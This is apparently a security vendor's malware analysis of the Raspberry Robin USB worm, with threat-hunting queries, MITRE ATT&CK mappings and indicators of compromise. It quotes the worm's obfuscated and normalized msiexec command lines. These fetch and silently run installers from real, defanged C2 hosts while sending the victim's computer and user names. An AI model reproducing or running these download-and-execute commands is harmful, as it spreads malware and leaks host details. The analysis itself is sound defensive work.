Introduction
Raspberry Robin is a worm transferred via USB drive that connects to primarily external QNAP devices (C2) to download and execute malicious payloads. This worm uses msiexec.exe to connect to its C2 server using an HTTP requests and download and execute malicious msi packages. Activity associated with this worm’s behavior was first publically reported by Red Canary in September 2022 . There is currently no clear indication which group is responsible for the creation or distribution of this worm although its use has been linked to recent SocGholish fake update campaigns earlier this year.
Attack Chain
Figure 1. Attack chain associated with Raspberry Robin attack detected by FortiGuard Responder team
Initial Access and Execution
Raspberry Robin typically arrives via an infected USB drive and the main component of the worm appears as an anomalous file on the infected removable device. There has been numerous file extension associated with these files and the filenames appear to be randomly generated. These files themselves are not executables but contain a set of obfuscated cmd commands padded with junk data that is ignored on execution. Alongside this file is a LNK file that executes the content of the main Raspberry Robin file stored in the infected USB drive using cmd.exe with /R parameter. An example of such a command line is shown below where, xyz.usb is an example filename used by Raspberry Robin.:
cmd /r c:\windows\system32\cmd.exe < xyz.usb
A successful execution of the malicious file runs an msiexec.exe that connects to the C2 server and downloads a malicious DLL. It will also run explorer.exe to display the contents of a folder on the compromised USB device.
Raspberry Robin File Contents
Each of the observed main Raspberry Robin files contain a huge chunks of random strings as shown below in Figure 2. However, a regular pattern can be found in each of the observed Raspberry Robin files:
- A huge block of random strings
- msiexec.exe to connect to the C2 server (with mixed random characters and randomized case)
- another huge block of random strings
- explorer.exe to display a folder (with a randomized case)
Figure 2. Example of typical Raspberry Robin main file content
Although the C2 servers and the folder name to display varies from file to file, each Raspberry Robin malicious file can be identified based on the pattern above. Also the combination of random characters attached to the msiexec.exe and explorer.exe varies, as does the capitalization in the main strings.
Each sample contains the msiexec command that connects to the C2 server. For this sample, the malware connects to the as3[.]biz via port 8080 with ‘%computername%’ and ‘%username%’ as additional parameters. These values will be populated with victim information on execution.
When cmd executes the contents of sample01.usb, the random strings will be ignored and the obfuscation in the commands will be simplified. For example, the command ”^StaR^t mS^i^e^X^Ec /q/ihTtP://aS3[.]Biz:8080/vS1CN41zizO/%COMPUtERnaME%?%USeRNAmE%” will normalize to, “start msiexec /q/ihttp://as3[.]biz:8080/vs1cn41zizo/%computername%?%username%”. This simplification can be used to create a cmdline based query if process creation telemetry is collected. In the case of the above sample, the server at as3[.]biz will serve an installer (msi file) that will be used by msiexec.exe. This C2 server also varies from samples to sample although all observed samples references a domain related to a QNAP device.
After executing the msiexec another command, ’start explorer “RemovableDisk”’, will be executed to display a folder named “Removable Disk” if it is available. Different variants of Raspberry Robin main file contained different strings referencing various common default names for removable USB drives.
Analyzing msiexec command
Raspberry Robin uses msiexe.exe to connect to the C2 server to download a malicious msi package. We can see these commands from the malicious files found in the infected drives, and the actual command varies from file to file. Also the addition of random strings to “start msiexec /q /I ” makes it distinct to other malicious files.
Below is a list of some combination of the msiexec commands found in different malicious files:
| Malicious file hash | Obfuscated msiexec commands | Normalized versions |
| 503620130e7d59853f7ba2119c9b410f0fe346ec | ^StaR^t mS^i^e^X^Ec /q/i"hTtP://aS3[.]Biz:8080/vS1CN41zizO/%COMPUtERnaME%?%USeRNAmE%" | start msiexec /q/i"http[:]//as3[.]biz:8080/vs1cn41zizo/%computername%?%username%" |
| 5506fc14acac1dc841abff2b972c972f3f1722ec | sT^ar^T ms^I^e^X^ec /Q /i"htTp://eJ3[.]xyZ:8080/xj92YfGKOB/%COmPUTeRNAmE%?%UseRName%" | start msiexec /q /i"http[:]//ej3[.]xyz:8080/xj92yfgkob/%computername%?%username%" |
| D92379ee6065391d06cb218dd0d713aa0e7b7942 | st^a^RT m^S^i^E^XeC ^h^L^x^kG^OA^aJ=cG^b^vK^W ^N^c^gBQ^j^YE^q=pS^r^t^t^Y^eG ^sW^aI^BH=^uD^o /Q ^Hp^yxy=^qxP ^bWiW^Uxi=ioA^Z^O -^f^v "http://5jb[.]Me:8080/yyyOd4/bXXDil5hPAU4EHelvZzFJewbWXUu0/xVKlBoCc/%ComputeRNaME%?%USeRnAMe%" | start msiexec /q -fv "http[:]//5jb[.]me:8080/yyyod4/bxxdil5hpau4ehelvzzfjewbwxuu0/xvklbocc/%computername%?%username%" |
| 008945cc473304fe2ad7aa4af6b14a120e6703b2 | St%fFFyTpReitUHj%a^RT%ffFytPREiTUhj% %FFFyTpReituhj%M^s^ie%fffyTPreiTUHJ%X^EC ^E^WjZ^L=Z^y^UQ^T^n^F^x ^vHe^t^H=ENa^p^h^n ^e^ry^ZIN=G^g /Q ^rv=^H^u^Bi f^oH^YML^wn=^H^kLtj^u^u ^I^G^v^sxI=ld^uK^kL^aN^U /^I"HttP://W4[.]nz:8080/A/rB/ZQ3N3i36PkkKgOuu6K/%compUTErnAme%=%useRNaMe%" | start msiexec /q /i"http[:]//w4[.]nz:8080/a/rb/zq3n3i36pkkkgouu6k/%computername%=%username%" |
Table 1. List of some combinations of msiexec commands found in different malicious samples
The msiexec parameter /q (short for /quiet) specifies quiet mode, which means there's no user interaction required. While /i parameter specifies normal installation.
Post Exploitation – HTTP Request
FortiEDR captures information related to the execution of msiexec.exe when it connects to the C2 server using the threat hunting query,
Type: ("Process Creation") AND Source.Process.Name: ("msiexec.exe") AND Source.Process.CommandLine: ("\/q\/i") AND Source.Process.CommandLine: ("http") AND Source.Process.CommandLine: ("\:8080")
Another threat hunting query can show us the HTTP request with port 8080 parameter in the URL executed by msiexec.exe:
Type: ("HTTP Request") AND URL: (":8080") AND Source.Process.Name: ("msiexec.exe")
Figure 3 below shows the details of one of the results of the query above. It shows details of an HTTP request including the actual C2 server. This query works on every HTTP request that has port 8080 parameter in its URL.
Figure 3. Details on one of the results of the threat hunting query mentioned above
START EXPLORER
Similar to the msiexec command, “start explorer ” is mixed with random strings found in different malicious files. Raspberry Robin uses explorer to display a folder with the specified name. If the folder with the specified name exists, the folder will be open, otherwise the default folder will be displayed. It is likely that these commands are included so that when the user clicks on the LNK file, the correct folder opens which matches expected behavior and prevents the user from suspecting that something suspicious has occurred.
The table below lists different “start explorer ” found in a number of analyzed samples:
| Malicious file hash | Obfuscated explorer commands | Normalized versions |
| 503620130e7d59853f7ba2119c9b410f0fe346ec | ^s^t^a^r^t ^e^x^P^l^orE^R "Removable Disk" | start explorer "removable disk" |
| 5506fc14acac1dc841abff2b972c972f3f1722ec | S^TA^rT ^E^xPl^o^R^e^r "USB Drive" | start explorer "usb drive" |
| D92379ee6065391d06cb218dd0d713aa0e7b7942 | S^t^aRt ex^PL^o^rE^R "ETIENNE II" | start explorer "etienne ii" |
| 008945cc473304fe2ad7aa4af6b14a120e6703b2 | St%ffFYtPreituHj%a^Rt%FffytPReITUhj% %FfFytPreitUHJ%e%FfFYtPReiTUhJ%X %fffytPrEituHj%P^lO%FFfYTpReITUhJ%R %ffFYtpReITuHj%e^R %fFfYtPrEiTuHj% v^IN^o^d | start explorer vinod |
Table 2. List of some combinations of explorer commands found in different malicious samples
Recent Attacks
Recently, we have seen new Raspberry Robin samples on endpoints protected by FortiEDR. In one of the analyzed incidents (see Figure 4 below) a USB drive was identified containing an LNK and an ICO file. The user clicked the LNK file which called a cmd process to execute contents of the ‘Fn.ICO’ file containing the Raspberry Robin commands. As described in the previous section the ‘Fn.ICO file’ contains a number of simple commands used to downloads and execute a malicious msi package from a C2 server. In this case the contacted domain was ‘u0[.]rS’. The complete msiexec command below (defanged):
msiexec.exe /qN -I "hTtP[:]//u0[.]rS[:]8080/BWB/PCbSiPnwkyKeutehyw4kvXESHV1an/<computername>?<username>"
We can see in Figure 4 below the execution of the LNK file leading to the connectivity to its C2 server. When a user clicks on the LNK file, FortiEDR identifies explorer.exe executing cmd.exe (expected LNK file process chain). The execution of LNK triggers another cmd.exe process, that now runs a series of msiexec.exe processes that download an installer from the C2 server ‘u0[.]rS’. In this event the malicious msiexec.exe process creates a suspended instance of the dllhost.exe process (standard Windows binary) which is subsequently hollowed with a malicious payload and the process resumed.
Process hollowing is a procedure where a process is started in the suspended state then it’s in-memory code is overwritten and replaced with different (often malicious) code. This technique can be used to hide malicious code within a whitelisted process. Process hollowing is also a way to execute a new executable without creating a new file as malicious code is written directly into memory rather than touching disk. When the hollowed process was resumes, the code injected into the dllhost.exe process then connects to a second stage C2 server, 199[.]249[.]230[.]115.
Figure 4. FortiEDR blocks Raspberry Robin’s connection attempt to its C2 server
In the attack analyzed above the affected customer did not have process hollowing protections in place but FortiEDR blocked the C2 connection attempts preventing the hollowed implant from effectively communicating with C2. FortiEDR has rules out of the box to prevent this process hollowing behavior and can be configured to remove hollowed implants using automated playbooks.
Using the Fortinet Central Threat System (CTS) shown in Figure 5, we can see that the IP address 199[.]249[.]230[.]115, is tagged as a Tor exit node. Tor is short for ‘The Onion Router’, and is a free and open-source network for anonymous communication. The Tor network is typically used for anonymous communication and is one way for threat actors to hide their C2. Unless there is a business need, it is recommended that customers block all communications too and from Tor exit nodes in corporate environments where possible. You can follow CISA guidance related to protecting against Tor access too and from your network at the following advisory: https://www.cisa.gov/uscert/sites/default/files/publications/AA20-183A_Defending_Against_Malicious_C...
Figure 5. Fortinet Central Threat Service (CTS) identifies 199[.]249[.]230[.]115 as a Tor exit node
The behavior analyzed above was just one of many observed Raspberry Robin infections detected and blocked by FortiEDR. The FortiGuard MDR team also identified different variants that also performed process hollowing targeting dllhost.exe, rundll32.exe and regsvr32.exe. Defenders using telemetry based monitoring should also look for anomalous network connections from these three executables where the parent process is msiexec if a tool capable of detecting process hollowing is not available.
Conclusion
The continued prevalence of Raspberry Robin highlights the need for organisations to continue to monitor the use of USB devices within their networks. It also highlights the need to consider the USB worm as a potential attack vector despite it being less common than the typical phishing or direct access initial access methods we see in more prevalent threats. In the instance that this type of worm is used to transfer a malicious payload into a FortiEDR protected environment, FortiEDR is positioned to continue to provide on-going protection from post-exploitation activity.
FortiEDR Threat Hunting telemetry can also be used to build additional detection methods to more quickly attribute observed activity to potential Raspberry Robin activity to expedite analyst triage. Threat Hunting queries designed to assist with detecting Raspberry Robin activity are shown below as are MITRE ATT&CK techniques involved with this activity and related observables, and IOCs related to observed activity.
Threat Hunting
This query will return all process creation events for msiexec.exe where the command line parameters include ‘/q /i', which indicates that the msiexec is quietly installing a msi package, and the command line parameters ‘http’ and ‘8080’ that can be indicators that the command is being used to access a remote msi package. There may be false positives if software used in a monitored environment that uses msiexec to install remote msi packages as part of updates but none were observed during testing:
|
This query will return all http request events for msiexec.exe where the URL contains port 8080. It is a more generic version of the above query. As with the previous query, there may be false positives if software used in a monitored environment that uses msiexec to install remote msi packages as part of updates but none were observed during testing:
|
This query will return all process creation event for dllhost.exe, rundll32.exe and regsvr32.exe processes spawned by msiexec.exe processes that have command line arguments consistent with the behavior of Raspberry Robin samples observed by the FortiGuard MDR team. As with the previous query, there may be false positives if software used in a monitored environment that uses msiexec to install remote msi packages as part of updates but none were observed during testing:
|
This query will detect thread created events where the source process is msiexec.exe and the child process is one of the processes targeted with process hollowing in Raspberry Robin activity observed by the FortiGuard MDR team. There are no expected false positives associated with this activity:
|
MITRE ATT&CK
TA0001 – Initial Access
|
Technique ID |
Technique Description |
Observed Activity |
|
T1091 |
Replication Through Removable Media |
Raspberry Robin activity analysed as part of this article is executed via compromised USB drive. As of now, we don’t know yet how the USB drives are getting infected. |
TA0008 – Lateral Movement
|
Technique ID |
Technique Description |
Observed Activity |
|
T1091 |
Replication Through Removable Media |
Raspberry Robin activity analysed as part of this article is executed via compromised USB drive. As of now, we don’t know yet how the USB drives are getting infected. |
T1059 - Execution
|
Technique ID |
Technique Description |
Observed Activity |
|
T1204.002 |
User Execution: Malicious File |
Raspberry Robin has relied upon users clicking on a malicious LNK file in a compromised USB drive. |
|
Technique ID |
Technique Description |
Observed Activity |
|
T1059.003 |
Command and Scripting Interpreter: Windows Command Shell |
Raspberry Robin includes the use of LNK execution to run cmd.exe to execute a set of commands stored in a file found in the USB drive. Due to LNK execution the parent process of cmd.exe will always be explorer.exe. |
TA0005 - Defense Evasion
|
Technique ID |
Technique Description |
Observed Activity |
|
T1218.009 |
System Binary Proxy Execution: msiexec.exe |
Raspberry Robin uses msiexec.exe to download and run a malicious installer. Msiexec.exe is called from a cmd.exe process as part of LNK execution and includes a URL as part of the command line arguments. |
|
Technique ID |
Technique Description |
Observed Activity |
|
T1055.012 |
Process Injection: Process Hollowing |
Raspberry Robin uses process hollowing to embed its final payload into a separate process. Variants observed by the FortiGuard MDR team have targeted dllhost.exe, rundll32.exe and regsvr32.exe processes. The hollowed processes were spawned by the msiexec.exe process. |
|
Technique ID |
Technique Description |
Observed Activity |
|
T1027 |
Obfuscated Files or Information |
Raspberry Robin executes commands stored in a file in the USB drive. It contains obfuscated msiexec.exe and explorer commands that includes randomized strings. |
TA0011 – Command and Control
|
Technique ID |
Technique Description |
Observed Activity |
|
T1071.001 |
Application Layer Protocol: Web Protocols |
Raspberry Robin tries to download a malicious installer from its C2 server via web request from the msiexec.exe process (legitimate msiexec functionality). Once the installer has executed and created a hollowed process (dllhost.exe, rundll32.exe, regsvr32.exe) with an injected payload, the payload will also attempt to connect to its C2 server via web requests to the Tor network. |
IOCs
|
Indicator Description |
Indicator |
Indicator Type |
Associated Tactic |
Notes |
First Observed |
|
Raspberry Robin sample |
503620130e7d59853f7ba2119c9b410f0fe346ec |
SHA1 Hash |
Installation |
Raspberry Robin sample that tries to connect to aS3[.]Biz |
2022-05-09 |
|
Raspberry Robin sample |
5506fc14acac1dc841abff2b972c972f3f1722ec |
SHA1 Hash |
Installation |
Raspberry Robin sample that tries to connect to eJ3[.]xyZ |
2022-05-30 |
|
Raspberry Robin sample |
D92379ee6065391d06cb218dd0d713aa0e7b7942 |
SHA1 Hash |
Installation |
Raspberry Robin sample that tries to connect to 5jb[.]Me |
2022-08-01 |
|
Raspberry Robin sample |
008945cc473304fe2ad7aa4af6b14a120e6703b2 |
SHA1 Hash |
Installation |
Raspberry Robin sample that tries to connect to w4[.]nz |
2022-08-06 |
|
MSI file |
3b552f77179299d3a3df06b3f687eb91013d46bb |
SHA1 Hash |
Installation |
MSI sample downloaded from Raspberry Robin’s C2 server such as w4[.]nz |
2022-07-03 |
|
DLL file |
bfcfa72ba5095fba108314c1c4deb5faed82ef4d |
SHA1 Hash |
Installation |
DLL file packaged within the MSI file downloaded by Raspberry Robin |
2022-01-20 |
|
Malicious URL |
http[:]//as3[.]biz:8080/vs1cn41zizo |
URL |
Installation |
Raspberry Robin C2 URL to download a malicious installer |
2022-05-09 |
|
Malicious URL |
http[:]//ej3[.]xyz:8080/xj92yfgkob |
URL |
Installation |
Raspberry Robin C2 URL to download a malicious installer |
2022-05-30 |
|
Malicious URL |
http[:]//5jb[.]me:8080/yyyod4/bxxdil5hpau4ehelvzzfjewbwxuu0/xvklbocc |
URL |
Installation |
Raspberry Robin C2 URL to download a malicious installer |
2022-08-01 |
|
Malicious URL |
http[:]//w4[.]nz:8080/a/rb/zq3n3i36pkkkgouu6k |
URL |
Installation |
Raspberry Robin C2 URL to download a malicious installer |
2022-08-06 |
|
Malicious URL |
hTtP[:]//u0[.]rS[:]8080/BWB/PCbSiPnwkyKeutehyw4kvXESHV1an/ |
URL |
Installation |
Raspberry Robin C2 URL to download a malicious installer |
2022-014 |
|
IP Address |
185[.]146[.]232[.]191 |
IP Address |
C2 |
Raspberry Robin C2 using tor exit node |
2022-09-14 |
|
IP Address |
212[.]186[.]71[.]38 |
IP Address |
C2 |
Raspberry Robin C2 using tor exit node |
2022-09-14 |
|
IP Address |
45[.]128[.]133[.]206 |
IP Address |
C2 |
Raspberry Robin C2 using tor exit node |
2022-09-14 |
|
IP Address |
188[.]165[.]26[.]89 |
IP Address |
C2 |
Raspberry Robin C2 using tor exit node |
2022-09-14 |
|
IP Address |
185[.]165[.]168[.]77 |
IP Address |
C2 |
Raspberry Robin C2 using tor exit node |
2022-09-14 |
|
IP Address |
198[.]50[.]238[.]128 |
IP Address |
C2 |
Raspberry Robin C2 using tor exit node |
2022-09-14 |
|
IP Address |
198[.]98[.]59[.]243 |
IP Address |
C2 |
Raspberry Robin C2 using tor exit node |
2022-09-14 |
|
IP Address |
74[.]208[.]203[.]175 |
IP Address |
C2 |
Raspberry Robin C2 using tor exit node |
2022-09-14 |
|
IP Address |
199[.]249[.]230[.]115 |
IP Address |
C2 |
Raspberry Robin C2 using tor exit node |
2022-09-14 |
